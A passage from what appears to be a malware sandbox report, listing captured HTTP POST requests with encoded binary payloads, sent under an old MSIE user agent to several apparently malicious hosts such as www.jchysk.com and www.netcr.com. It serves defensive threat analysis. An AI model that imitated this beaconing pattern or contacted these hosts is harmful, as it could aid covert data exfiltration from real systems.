33 62 68 46 44 39 52 58 47 5a 6e 39 33 70 38 76 6a 6a 70 4b 77 58 43 4d 46 50 38 34 6b 56 35 6e 6d 33 62 69 53 72 34 4d 6a 4c 41 6c 2f 78 43 30 58 33 53 34 66 37 2b 52 69 52 68 72 71 4c 32 6e 76 4e 69 6c 4d 54 77 4c 6e 32 33 36 39 6f 34 78 62 75 6d 74 72 2b 77 4e 37 7a 68 56 33 68 6f 57 72 4e 35 55 55 63 55 34 78 66 6f 70 69 69 55 71 44 57 2f 57 6d 63 4b 4b 62 67 4c 48 33 46 64 58 36 64 34 62 37 2f 38 6e 56 6c 56 46 71 61 42 6a 58 6d 4d 79 4d 6c 4c 68 69 4c 38 64 76 77 6f 5a 46 57 52 51 56 79 69 37 53 51 61 70 78 30 6d 64 30 4b 76 38 6d 73 4b 75 6f 73 6e 52 37 67 65 68 54 41 42 37 34 34 51 55 67 67 70 4b 58 54 31 4e 6b 64 51 2b 69 72 43 55 4f 6b 4c 68 75 61 78 46 32 54 56 42 4e 47 44 4c 54 4f 36 5a 74 6c 67 35 4f 75 58 56 39 36 5a 72 52 57 53 58 67 70 46 59 4f 59 7a 38 37 30 51 42 6b 4a 59 67 79 4d 56 2b 6e 45 45 2b 34 75 47 4f 6e 38 4f 6a 45 55 41 71 67 37 76 49 67 61 68 77 47 46 2b 38 64 54 39 68 67 69 46 45 35 4f 50 31 63 39 50 31 38 74 64 59 6f 4d 7a 39 66 62 45 70 70 6c 79 38 30 50 5a 54 67 3d 3d Data Ascii: GO0BlwN6AZkoP++pCldqgizLysapcEjG54dTcHci4drMZxqZLhLdGVYCRR8dcisuVLLT4d8suPHUD8icvjY0qoRXfBZ0gZ359gXJVY9wLiDwYS/vHKhCnZs7ZoKrpYUchIlj2LM8lKzf2OWLdXoNiB6t+KiYRfKh0tmixUySeiI4VgVvNbYM0amerfZ+xezVtiD/yeYUsRcaz5Y65LRlib4ufie5XkVRfN231/T4bhhE8DkCb7sBH3bhFD9RXGZn93p8vjjpKwXCMFP84kV5nm3biSr4MjLAl/xC0X3S4f7+RiRhrqL2nvNilMTwLn2369o4xbumtr+wN7zhV3hoWrN5UUcU4xfopiiUqDW/WmcKKbgLH3FdX6d4b7/8nVlVFqaBjXmMyMlLhiL8dvwoZFWRQVyi7SQapx0md0Kv8msKuosnR7gehTAB744QUggpKXT1NkdQ+irCUOkLhuaxF2TVBNGDLTO6Ztlg5OuXV96ZrRWSXgpFYOYz870QBkJYgyMV+nEE+4uGOn8OjEUAqg7vIgahwGF+8dT9hgiFE5OP1c9P18tdYoMz9fbEpply80PZTg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6c 4d 6b 4e 6e 50 61 6a 41 5a 6e 70 4e 41 43 4a 55 55 72 65 71 35 6e 4d 49 64 67 57 61 55 2f 62 69 6f 38 67 39 52 75 2f 56 6d 4e 6c 68 32 75 67 55 7a 6b 57 66 78 47 31 55 74 50 6a 50 37 70 2b 4f 69 2b 48 71 59 30 49 79 52 4b 68 51 2f 50 52 4a 6d 50 31 64 77 6b 4e 75 68 45 56 47 4c 51 75 72 75 7a 66 4e 35 71 78 48 61 4c 42 30 50 64 6e 52 36 6f 39 54 6b 4c 6c 66 63 4f 68 38 68 32 41 43 6c 6f 70 36 61 59 70 7a 36 73 4c 37 2b 4c 53 63 6d 65 39 63 78 76 31 69 37 4b 6d 32 2f 49 76 73 48 78 76 75 6e 77 71 69 79 47 47 52 70 6a 62 39 78 61 51 46 62 75 75 54 74 66 35 6a 42 6c 6f 53 50 69 79 79 41 66 37 31 4f 34 71 77 65 75 4e 44 51 46 72 34 77 79 68 54 35 71 67 72 69 31 51 79 42 73 51 6e 72 2b 35 36 4c 7a 35 4b 53 4e 69 36 66 58 66 78 30 38 56 6e 62 56 44 4a 51 64 45 31 2b 30 5a 65 45 67 4e 77 55 63 77 6e 59 33 76 67 64 36 79 43 48 4a 69 50 5a 6f 70 4e 61 6e 36 6b 7a 62 47 69 47 56 31 59 4b 43 55 56 45 6c 42 7a 39 36 30 4f 37 76 69 55 69 59 45 72 78 2f 31 77 6c 50 69 4d 39 53 68 39 61 51 63 54 45 63 33 47 4f 2b 4a 69 2b 69 58 78 39 6b 6e 37 6d 74 39 35 6c 77 37 78 4d 4e 50 32 2f 4d 49 6e 4f 75 51 73 66 4d 50 56 6f 75 53 39 6a 79 48 76 51 64 49 31 51 70 34 48 66 43 41 7a 55 50 71 6e 2f 6c 36 64 51 79 62 77 78 61 2f 6f 33 53 54 76 31 63 73 37 34 33 43 62 6a 30 46 6c 43 6f 37 78 34 4b 79 4a 70 34 31 66 41 53 4f 35 62 4a 7a 53 54 4c 4f 74 48 38 2f 44 6e 64 31 4c 51 6e 63 44 4a 58 67 32 4d 31 57 65 56 53 5a 6b 4e 4e 63 4c 52 6f 54 74 4e 79 58 64 44 47 56 4a 51 53 46 6e 52 47 39 31 73 4f 54 33 7a 6e 38 6f 61 51 70 6f 66 7a 68 54 2b 6d 66 70 35 4b 79 68 2f 71 64 4a 57 74 74 72 4d 71 72 42 43 6e 51 2f 42 59 78 46 74 50 2b 73 73 6e 56 74 6a 36 77 59 6e 57 7a 52 7a 37 32 71 67 32 74 31 48 68 2f 79 62 59 3d Data Ascii: lMkNnPajAZnpNACJUUreq5nMIdgWaU/bio8g9Ru/VmNlh2ugUzkWfxG1UtPjP7p+Oi+HqY0IyRKhQ/PRJmP1dwkNuhEVGLQuruzfN5qxHaLB0PdnR6o9TkLlfcOh8h2AClop6aYpz6sL7+LScme9cxv1i7Km2/IvsHxvunwqiyGGRpjb9xaQFbuuTtf5jBloSPiyyAf71O4qweuNDQFr4wyhT5qgri1QyBsQnr+56Lz5KSNi6fXfx08VnbVDJQdE1+0ZeEgNwUcwnY3vgd6yCHJiPZopNan6kzbGiGV1YKCUVElBz960O7viUiYErx/1wlPiM9Sh9aQcTEc3GO+Ji+iXx9kn7mt95lw7xMNP2/MInOuQsfMPVouS9jyHvQdI1Qp4HfCAzUPqn/l6dQybwxa/o3STv1cs743Cbj0FlCo7x4KyJp41fASO5bJzSTLOtH8/Dnd1LQncDJXg2M1WeVSZkNNcLRoTtNyXdDGVJQSFnRG91sOT3zn8oaQpofzhT+mfp5Kyh/qdJWttrMqrBCnQ/BYxFtP+ssnVtj6wYnWzRz72qg2t1Hh/ybY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 2f 2b 70 6c 69 56 33 41 5a 6c 44 57 71 76 39 7a 4c 36 58 4f 5a 34 65 4d 54 4e 7a 71 64 73 79 4b 5a 62 4e 52 41 41 51 4f 64 57 56 59 6d 6e 6c 34 70 41 68 77 79 73 51 4f 73 55 52 4d 58 46 69 7a 39 43 30 2b 6f 5a 66 67 6d 54 41 69 30 52 56 30 58 33 41 44 57 4a 6a 45 48 6e 7a 50 45 67 54 7a 37 41 45 6e 77 55 76 38 53 72 4d 76 79 72 68 7a 4b 52 7a 62 62 39 2b 4f 73 7a 50 51 54 5a 72 69 6d 67 45 50 63 77 78 47 68 70 6a 6a 32 6b 52 59 30 39 78 34 6c 67 6e 58 74 70 78 69 75 4d 34 33 50 63 44 42 41 35 35 4d 54 52 4c 4c 4a 43 72 32 38 73 51 43 39 4f 4c 6e 48 38 4d 6a 71 67 43 61 6f 54 34 70 58 61 61 45 53 79 51 36 64 52 30 4a 55 48 4e 56 62 42 6d 50 72 57 42 72 58 4f 7a 77 70 53 38 46 38 62 75 39 4a 38 57 64 32 72 6c 51 56 58 30 52 67 6d 2f 51 4c 30 75 65 79 4a 73 34 49 78 4a 2f 56 4f 4d 71 54 46 50 39 37 39 74 37 64 6d 2b 31 51 6e 44 58 30 66 7a 48 6e 55 48 69 33 48 36 39 6d 31 72 6c 56 6f 48 37 75 33 5a 56 38 32 51 30 56 2f 4c 52 53 65 37 38 52 51 57 4e 33 57 54 69 59 53 68 49 6b 55 72 44 4b 65 49 63 49 6a 31 7a 79 66 76 65 64 38 56 61 49 52 79 2f 36 64 7a 46 4d 6d 38 36 4e 4d 46 6d 41 34 57 72 6f 56 6b 44 54 4e 39 52 2f 72 52 37 37 4e 79 64 68 61 44 59 30 61 45 4e 71 71 52 68 48 62 64 66 62 76 6e 39 32 49 63 44 46 69 4a 70 61 67 79 6c 70 49 58 75 52 65 34 76 4e 49 72 38 36 4e 49 33 33 64 43 32 64 73 62 48 64 78 58 30 31 68 7a 61 4d 53 66 75 68 55 4d 70 4f 71 4f 58 43 6f 53 74 4c 68 39 5a 73 55 6a 58 4e 79 65 72 2f 4f 33 61 4c 35 4b 44 44 75 33 6e 35 70 2b 2f 43 63 79 4e 6d 38 77 45 54 45 41 46 77 57 48 63 62 4c 47 2f 7a 6b 46 57 53 57 6d 48 31 39 6f 4b 56 63 4f 73 36 42 50 6c 48 7a 4d 6c 53 38 7a 67 4a 4e 53 53 4a 53 30 57 52 38 43 73 74 52 74 66 52 77 46 52 4b 4e 68 2b 31 4c 58 63 51 6c 56 53 6c 79 50 6c 34 51 3d Data Ascii: b/+pliV3AZlDWqv9zL6XOZ4eMTNzqdsyKZbNRAAQOdWVYmnl4pAhwysQOsURMXFiz9C0+oZfgmTAi0RV0X3ADWJjEHnzPEgTz7AEnwUv8SrMvyrhzKRzbb9+OszPQTZrimgEPcwxGhpjj2kRY09x4lgnXtpxiuM43PcDBA55MTRLLJCr28sQC9OLnH8MjqgCaoT4pXaaESyQ6dR0JUHNVbBmPrWBrXOzwpS8F8bu9J8Wd2rlQVX0Rgm/QL0ueyJs4IxJ/VOMqTFP979t7dm+1QnDX0fzHnUHi3H69m1rlVoH7u3ZV82Q0V/LRSe78RQWN3WTiYShIkUrDKeIcIj1zyfved8VaIRy/6dzFMm86NMFmA4WroVkDTN9R/rR77NydhaDY0aENqqRhHbdfbvn92IcDFiJpagylpIXuRe4vNIr86NI33dC2dsbHdxX01hzaMSfuhUMpOqOXCoStLh9ZsUjXNyer/O3aL5KDDu3n5p+/CcyNm8wETEAFwWHcbLG/zkFWSWmH19oKVcOs6BPlHzMlS8zgJNSSJS0WR8CstRtfRwFRKNh+1LXcQlVSlyPl4Q=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 6c 4d 6b 4e 6e 50 61 6a 41 5a 6e 70 4e 41 43 4a 55 55 72 65 71 35 6e 4d 49 64 67 57 61 55 2f 62 69 6f 38 67 39 52 75 2f 56 6d 4e 6c 68 32 75 67 55 7a 6b 57 66 78 47 31 55 74 50 6a 50 37 70 2b 4f 69 2b 48 71 59 30 49 79 52 4b 68 51 2f 50 52 4a 6d 50 31 64 77 6b 4e 75 68 45 56 47 4c 51 75 72 75 7a 66 4e 35 71 78 48 61 4c 42 30 50 64 6e 52 36 6f 39 54 6b 4c 6c 66 63 4f 68 38 68 32 41 43 6c 6f 70 36 61 59 70 7a 36 73 4c 37 2b 4c 53 63 6d 65 39 63 78 76 31 69 37 4b 6d 32 2f 49 76 73 48 78 76 75 6e 77 71 69 79 47 47 52 70 6a 62 39 78 61 51 46 62 75 75 54 74 66 35 6a 42 6c 6f 53 50 69 79 79 41 66 37 31 4f 34 71 77 65 75 4e 44 51 46 72 34 77 79 68 54 35 71 67 72 69 31 51 79 42 73 51 6e 72 2b 35 36 4c 7a 35 4b 53 4e 69 36 66 58 66 78 30 38 56 6e 62 56 44 4a 51 64 45 31 2b 30 5a 65 45 67 4e 77 55 63 77 6e 59 33 76 67 64 36 79 43 48 4a 69 50 5a 6f 70 4e 61 6e 36 6b 7a 62 47 69 47 56 31 59 4b 43 55 56 45 6c 42 7a 39 36 30 4f 37 76 69 55 69 59 45 72 78 2f 31 77 6c 50 69 4d 39 53 68 39 61 51 63 54 45 63 33 47 4f 2b 4a 69 2b 69 58 78 39 6b 6e 37 6d 74 39 35 6c 77 37 78 4d 4e 50 32 2f 4d 49 6e 4f 75 51 73 66 4d 50 56 6f 75 53 39 6a 79 48 76 51 64 49 31 51 70 34 48 66 43 41 7a 55 50 71 6e 2f 6c 36 64 51 79 62 77 78 61 2f 6f 33 53 54 76 31 63 73 37 34 33 43 62 6a 30 46 6c 43 6f 37 78 34 4b 79 4a 70 34 31 66 41 53 4f 35 62 4a 7a 53 54 4c 4f 74 48 38 2f 44 6e 64 31 4c 51 6e 63 44 4a 58 67 32 4d 31 57 65 56 53 5a 6b 4e 4e 63 4c 52 6f 54 74 4e 79 58 64 44 47 56 4a 51 53 46 6e 52 47 39 31 73 4f 54 33 7a 6e 38 6f 61 51 70 6f 66 7a 68 54 2b 6d 66 70 35 4b 79 68 2f 71 64 4a 57 74 74 72 4d 71 72 42 43 6e 51 2f 42 59 78 46 74 50 2b 73 73 6e 56 74 6a 36 77 59 6e 57 7a 52 7a 37 32 71 67 32 74 31 48 68 2f 79 62 59 3d Data Ascii: lMkNnPajAZnpNACJUUreq5nMIdgWaU/bio8g9Ru/VmNlh2ugUzkWfxG1UtPjP7p+Oi+HqY0IyRKhQ/PRJmP1dwkNuhEVGLQuruzfN5qxHaLB0PdnR6o9TkLlfcOh8h2AClop6aYpz6sL7+LScme9cxv1i7Km2/IvsHxvunwqiyGGRpjb9xaQFbuuTtf5jBloSPiyyAf71O4qweuNDQFr4wyhT5qgri1QyBsQnr+56Lz5KSNi6fXfx08VnbVDJQdE1+0ZeEgNwUcwnY3vgd6yCHJiPZopNan6kzbGiGV1YKCUVElBz960O7viUiYErx/1wlPiM9Sh9aQcTEc3GO+Ji+iXx9kn7mt95lw7xMNP2/MInOuQsfMPVouS9jyHvQdI1Qp4HfCAzUPqn/l6dQybwxa/o3STv1cs743Cbj0FlCo7x4KyJp41fASO5bJzSTLOtH8/Dnd1LQncDJXg2M1WeVSZkNNcLRoTtNyXdDGVJQSFnRG91sOT3zn8oaQpofzhT+mfp5Kyh/qdJWttrMqrBCnQ/BYxFtP+ssnVtj6wYnWzRz72qg2t1Hh/ybY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 55 44 68 59 53 75 4e 4d 42 35 6c 36 6c 44 31 4a 61 6b 79 62 62 41 78 39 61 79 4d 4a 2f 63 68 46 78 78 44 48 51 4b 67 4f 4f 30 71 37 7a 76 55 39 70 63 59 79 76 55 68 76 36 2f 4e 75 65 6a 68 2b 33 43 2b 39 45 38 53 37 77 6e 35 44 4d 58 74 79 35 75 39 69 4c 75 4e 35 5a 61 41 33 50 4a 57 6d 6a 33 78 63 79 39 79 33 39 7a 77 68 73 63 39 71 44 47 59 69 57 56 32 4f 65 4c 39 47 39 7a 54 41 30 2b 48 67 31 64 61 33 55 79 67 71 79 2b 38 4c 79 42 77 2b 67 42 45 56 42 42 4b 44 6f 6e 50 6c 4d 6f 6f 72 77 75 45 4c 4c 65 6e 4a 67 63 66 34 37 32 36 7a 46 31 6f 7a 71 69 76 79 6c 50 66 42 7a 6f 37 67 53 4a 42 55 58 44 6f 73 57 43 69 32 54 6a 48 53 62 30 38 4f 49 64 58 39 4b 7a 35 76 50 36 55 4f 49 42 58 55 6a 77 38 48 49 34 77 42 55 51 47 34 73 59 6b 47 6c 75 74 41 36 67 4e 58 34 63 61 2b 74 55 52 78 53 57 6d 78 76 70 6f 74 52 51 62 70 59 57 6e 4c 79 53 57 36 65 76 59 5a 31 76 52 47 73 51 79 2f 72 50 4c 5a 4d 46 38 69 4a 5a 6f 42 6f 57 34 35 64 53 47 7a 65 4d 5a 53 46 52 59 32 31 76 37 79 48 51 32 69 37 77 4b 43 45 50 64 77 44 54 38 6b 7a 31 47 4c 5a 74 34 66 70 34 67 4f 57 69 4a 70 4e 36 56 35 4e 55 76 73 42 35 34 42 44 39 66 4f 46 34 47 4e 68 44 65 49 32 65 33 34 68 6c 51 37 47 52 73 38 30 63 66 32 70 4e 68 73 35 7a 6b 4d 62 43 36 47 2f 63 58 71 78 2b 69 43 74 4b 79 39 4e 57 57 59 75 49 47 77 61 78 6c 71 66 45 78 68 5a 76 69 43 5a 39 35 68 5a 6a 54 56 2f 61 75 39 64 47 38 6e 67 56 66 6c 42 65 38 6d 37 6a 41 36 46 58 5a 59 76 34 6e 76 6a 54 61 54 6d 61 6f 4a 5a 52 7a 53 2f 39 41 56 51 63 45 2b 6c 32 78 61 44 4e 4d 4d 70 4d 6c 69 79 79 4c 61 54 50 59 44 73 4c 4a 62 4e 32 51 5a 33 63 38 3d Data Ascii: UDhYSuNMB5l6lD1JakybbAx9ayMJ/chFxxDHQKgOO0q7zvU9pcYyvUhv6/Nuejh+3C+9E8S7wn5DMXty5u9iLuN5ZaA3PJWmj3xcy9y39zwhsc9qDGYiWV2OeL9G9zTA0+Hg1da3Uygqy+8LyBw+gBEVBBKDonPlMoorwuELLenJgcf4726zF1ozqivylPfBzo7gSJBUXDosWCi2TjHSb08OIdX9Kz5vP6UOIBXUjw8HI4wBUQG4sYkGlutA6gNX4ca+tURxSWmxvpotRQbpYWnLySW6evYZ1vRGsQy/rPLZMF8iJZoBoW45dSGzeMZSFRY21v7yHQ2i7wKCEPdwDT8kz1GLZt4fp4gOWiJpN6V5NUvsB54BD9fOF4GNhDeI2e34hlQ7GRs80cf2pNhs5zkMbC6G/cXqx+iCtKy9NWWYuIGwaxlqfExhZviCZ95hZjTV/au9dG8ngVflBe8m7jA6FXZYv4nvjTaTmaoJZRzS/9AVQcE+l2xaDNMMpMliyyLaTPYDsLJbN2QZ3c8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 6f 35 4b 4f 6c 72 63 57 45 70 6c 67 31 5a 33 68 4a 67 52 47 62 77 44 75 63 6a 31 74 50 57 59 78 32 2f 55 32 33 4b 7a 73 69 59 53 59 4c 4a 6e 65 57 42 44 56 65 34 4c 6e 65 33 39 67 34 68 45 6c 62 36 6f 37 55 32 30 64 47 35 51 71 57 43 55 6c 4e 72 59 56 46 6c 48 33 7a 58 59 73 76 36 38 47 43 2b 6d 46 30 48 61 66 64 61 64 74 44 38 41 65 65 6b 38 72 65 77 43 61 75 2f 77 38 57 4b 76 48 73 44 57 44 58 48 74 59 55 74 42 50 67 34 73 38 36 4c 41 4f 48 6f 2f 68 6d 30 68 79 71 2b 48 37 56 37 74 43 6b 4d 4a 67 54 70 47 6f 4a 38 2b 69 2f 56 71 55 79 64 44 69 31 5a 2f 35 44 7a 41 69 72 2f 72 62 55 58 41 48 33 62 36 2f 59 65 61 4a 56 6f 38 52 73 75 4f 51 35 6a 79 38 56 33 41 51 39 56 61 4a 32 73 69 78 63 47 59 2b 50 59 42 6f 59 2b 4f 31 32 44 44 59 77 2b 63 41 6c 77 70 5a 51 51 74 68 61 32 4f 5a 6d 44 6e 75 4a 70 57 6e 4e 45 6c 7a 43 6b 51 56 47 43 57 53 39 53 56 42 68 6d 36 32 54 6e 4b 74 48 46 6a 66 36 34 55 75 49 2f 52 36 70 44 66 66 31 38 44 34 6f 41 45 61 2f 6e 73 78 6c 6b 47 49 59 71 35 30 74 59 42 55 4e 51 6d 66 2f 46 4c 62 4b 66 32 41 53 4e 69 2b 74 32 39 58 70 2f 4a 33 79 36 49 44 4d 6b 49 49 71 6f 31 68 65 44 6d 71 35 70 74 4c 38 69 32 57 58 39 62 39 4a 79 6a 78 79 37 65 32 47 57 54 51 76 2f 57 56 30 75 53 62 64 4e 55 65 42 66 64 33 47 73 6a 55 4d 71 33 50 34 4a 70 6a 54 6c 55 45 74 51 31 54 31 30 61 45 37 61 49 36 58 59 41 33 31 63 52 76 67 76 49 4e 73 35 76 44 65 71 31 67 55 56 4a 65 39 49 53 4d 42 78 2f 54 76 4e 45 51 63 77 69 79 58 43 39 59 33 2b 45 6e 37 6c 4c 71 39 2b 4b 74 75 57 69 73 58 54 72 44 75 4a 74 67 61 45 76 5a 6b 39 7a 33 53 4b 41 73 39 56 50 53 43 42 4f 43 78 74 61 43 4f 54 6b 51 6c 51 4e 44 50 63 42 43 57 36 72 54 46 45 5a 52 73 4f 30 30 79 79 6d 7a 49 63 36 6b 51 31 43 51 51 78 46 56 37 4b 49 51 64 51 3d 3d Data Ascii: o5KOlrcWEplg1Z3hJgRGbwDucj1tPWYx2/U23KzsiYSYLJneWBDVe4Lne39g4hElb6o7U20dG5QqWCUlNrYVFlH3zXYsv68GC+mF0HafdadtD8Aeek8rewCau/w8WKvHsDWDXHtYUtBPg4s86LAOHo/hm0hyq+H7V7tCkMJgTpGoJ8+i/VqUydDi1Z/5DzAir/rbUXAH3b6/YeaJVo8RsuOQ5jy8V3AQ9VaJ2sixcGY+PYBoY+O12DDYw+cAlwpZQQtha2OZmDnuJpWnNElzCkQVGCWS9SVBhm62TnKtHFjf64UuI/R6pDff18D4oAEa/nsxlkGIYq50tYBUNQmf/FLbKf2ASNi+t29Xp/J3y6IDMkIIqo1heDmq5ptL8i2WX9b9Jyjxy7e2GWTQv/WV0uSbdNUeBfd3GsjUMq3P4JpjTlUEtQ1T10aE7aI6XYA31cRvgvINs5vDeq1gUVJe9ISMBx/TvNEQcwiyXC9Y3+En7lLq9+KtuWisXTrDuJtgaEvZk9z3SKAs9VPSCBOCxtaCOTkQlQNDPcBCW6rTFEZRsO00yymzIc6kQ1CQQxFV7KIQdQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 2f 2b 70 6c 69 56 33 41 5a 6c 44 57 71 76 39 7a 4c 36 58 4f 5a 34 65 4d 54 4e 7a 71 64 73 79 4b 5a 62 4e 52 41 41 51 4f 64 57 56 59 6d 6e 6c 34 70 41 68 77 79 73 51 4f 73 55 52 4d 58 46 69 7a 39 43 30 2b 6f 5a 66 67 6d 54 41 69 30 52 56 30 58 33 41 44 57 4a 6a 45 48 6e 7a 50 45 67 54 7a 37 41 45 6e 77 55 76 38 53 72 4d 76 79 72 68 7a 4b 52 7a 62 62 39 2b 4f 73 7a 50 51 54 5a 72 69 6d 67 45 50 63 77 78 47 68 70 6a 6a 32 6b 52 59 30 39 78 34 6c 67 6e 58 74 70 78 69 75 4d 34 33 50 63 44 42 41 35 35 4d 54 52 4c 4c 4a 43 72 32 38 73 51 43 39 4f 4c 6e 48 38 4d 6a 71 67 43 61 6f 54 34 70 58 61 61 45 53 79 51 36 64 52 30 4a 55 48 4e 56 62 42 6d 50 72 57 42 72 58 4f 7a 77 70 53 38 46 38 62 75 39 4a 38 57 64 32 72 6c 51 56 58 30 52 67 6d 2f 51 4c 30 75 65 79 4a 73 34 49 78 4a 2f 56 4f 4d 71 54 46 50 39 37 39 74 37 64 6d 2b 31 51 6e 44 58 30 66 7a 48 6e 55 48 69 33 48 36 39 6d 31 72 6c 56 6f 48 37 75 33 5a 56 38 32 51 30 56 2f 4c 52 53 65 37 38 52 51 57 4e 33 57 54 69 59 53 68 49 6b 55 72 44 4b 65 49 63 49 6a 31 7a 79 66 76 65 64 38 56 61 49 52 79 2f 36 64 7a 46 4d 6d 38 36 4e 4d 46 6d 41 34 57 72 6f 56 6b 44 54 4e 39 52 2f 72 52 37 37 4e 79 64 68 61 44 59 30 61 45 4e 71 71 52 68 48 62 64 66 62 76 6e 39 32 49 63 44 46 69 4a 70 61 67 79 6c 70 49 58 75 52 65 34 76 4e 49 72 38 36 4e 49 33 33 64 43 32 64 73 62 48 64 78 58 30 31 68 7a 61 4d 53 66 75 68 55 4d 70 4f 71 4f 58 43 6f 53 74 4c 68 39 5a 73 55 6a 58 4e 79 65 72 2f 4f 33 61 4c 35 4b 44 44 75 33 6e 35 70 2b 2f 43 63 79 4e 6d 38 77 45 54 45 41 46 77 57 48 63 62 4c 47 2f 7a 6b 46 57 53 57 6d 48 31 39 6f 4b 56 63 4f 73 36 42 50 6c 48 7a 4d 6c 53 38 7a 67 4a 4e 53 53 4a 53 30 57 52 38 43 73 74 52 74 66 52 77 46 52 4b 4e 68 2b 31 4c 58 63 51 6c 56 53 6c 79 50 6c 34 51 3d Data Ascii: b/+pliV3AZlDWqv9zL6XOZ4eMTNzqdsyKZbNRAAQOdWVYmnl4pAhwysQOsURMXFiz9C0+oZfgmTAi0RV0X3ADWJjEHnzPEgTz7AEnwUv8SrMvyrhzKRzbb9+OszPQTZrimgEPcwxGhpjj2kRY09x4lgnXtpxiuM43PcDBA55MTRLLJCr28sQC9OLnH8MjqgCaoT4pXaaESyQ6dR0JUHNVbBmPrWBrXOzwpS8F8bu9J8Wd2rlQVX0Rgm/QL0ueyJs4IxJ/VOMqTFP979t7dm+1QnDX0fzHnUHi3H69m1rlVoH7u3ZV82Q0V/LRSe78RQWN3WTiYShIkUrDKeIcIj1zyfved8VaIRy/6dzFMm86NMFmA4WroVkDTN9R/rR77NydhaDY0aENqqRhHbdfbvn92IcDFiJpagylpIXuRe4vNIr86NI33dC2dsbHdxX01hzaMSfuhUMpOqOXCoStLh9ZsUjXNyer/O3aL5KDDu3n5p+/CcyNm8wETEAFwWHcbLG/zkFWSWmH19oKVcOs6BPlHzMlS8zgJNSSJS0WR8CstRtfRwFRKNh+1LXcQlVSlyPl4Q=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 65 57 74 66 75 72 57 51 47 35 6d 74 57 62 5a 56 48 47 6f 71 49 4b 36 2b 47 79 31 44 4b 68 77 42 75 54 69 32 42 56 51 4c 78 71 61 6d 44 4b 4b 6d 48 51 69 32 49 6a 46 61 74 59 33 42 53 4f 58 75 4e 74 76 43 72 45 59 35 6a 30 56 45 65 4f 4c 6c 68 5a 72 77 72 4a 34 6f 41 56 4a 35 67 70 39 2f 4b 70 74 64 45 59 30 6a 6f 7a 51 42 67 62 46 4b 6f 6f 71 6c 46 34 71 36 69 52 43 6c 62 70 6d 2b 53 6a 2f 69 43 4c 42 42 67 63 2f 72 6f 6d 66 69 48 43 50 48 42 52 47 4f 6b 52 48 69 51 65 6f 69 56 66 7a 4d 58 64 4c 56 35 6c 77 73 37 5a 6c 6d 55 79 4c 47 73 36 42 44 45 42 72 32 59 53 72 43 2b 76 6e 38 52 67 54 55 61 79 4c 57 47 57 6e 54 37 54 6f 4b 4d 6b 7a 76 61 32 76 34 66 77 46 42 35 67 71 4c 38 43 73 6e 69 4f 59 30 45 50 2b 37 57 34 53 4d 67 48 39 6b 50 53 36 45 78 41 6e 57 36 71 66 33 2f 72 6e 42 51 66 75 71 56 2b 42 33 67 64 73 4e 4e 68 73 53 6b 61 4e 32 4e 37 78 72 51 55 41 30 41 43 4e 30 69 5a 75 68 34 38 4c 75 44 55 4a 50 64 6f 74 6b 31 31 51 57 64 77 36 58 6c 66 73 53 33 4a 61 50 52 34 69 53 31 65 77 75 43 78 71 72 62 61 5a 6e 67 61 72 62 74 78 52 55 4d 6e 30 49 34 64 61 36 31 31 55 36 35 38 46 66 69 68 6c 51 44 63 4b 75 51 4c 70 4c 5a 74 4c 6b 6f 30 77 46 52 4e 4a 6b 4e 70 32 74 65 6e 6c 54 62 48 67 71 61 70 36 70 35 6e 71 49 59 65 67 69 61 4e 32 34 58 33 6f 36 4d 35 74 43 4f 4f 71 2b 5a 47 72 67 42 59 55 49 32 49 76 6d 4c 48 32 49 6a 78 4f 53 70 6e 4b 64 62 6d 77 52 52 78 58 76 6e 62 62 70 34 4d 33 4e 30 38 31 7a 73 43 33 59 68 56 45 78 36 79 59 44 78 2b 68 50 41 31 6c 59 62 30 50 6e 45 72 33 54 66 45 4f 77 77 37 58 34 59 52 76 2b 41 72 61 38 44 4e 4f 4f 52 70 4b 78 4e 4e 54 6f 45 6a 52 61 4d 42 34 61 59 6d 65 56 6f 50 37 70 55 44 33 73 37 46 56 6e 6f 53 45 52 2f 53 6d 54 34 48 44 74 6e 75 6a 54 45 68 2b 2b 36 35 62 35 47 71 42 74 42 30 63 3d Data Ascii: 